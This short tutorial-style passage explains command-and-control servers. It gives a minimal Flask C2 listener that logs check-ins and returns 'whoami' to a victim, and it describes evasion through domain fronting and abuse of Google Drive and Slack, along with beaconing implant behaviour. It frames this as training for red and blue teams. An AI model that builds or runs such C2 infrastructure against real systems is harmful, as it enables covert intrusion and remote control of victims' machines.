Red Teams use frameworks like Cobalt Strike or Covenant. But building your own C2 teaches you how they work (and why Antivirus detects them).
# Flask C2 Server
from flask import Flask, request
app = Flask(__name__)
@app.route('/checkin', methods=['POST'])
def checkin():
data = request.form['data']
print(f"[+] Received checkin: {data}")
return "whoami" # Send command back to victim
if __name__ == '__main__':
app.run(port=8080)
Hiding in Plain Sight
Real C2s don't use raw sockets.
They hide inside valid HTTPS traffic (Domain Fronting).
Or they use legit services like "Google Drive" or "Slack" API to send commands, making it impossible to block without blocking Google.
1. The Agent (Implant)
The client side code (malware) must be persistent.
It sleeps for 5 minutes, wakes up, sends a "Heartbeat" (GET request) to the server, executes the command, and sleeps again.
This is why finding "Beacons" in network logs is a key Job for Blue Teams.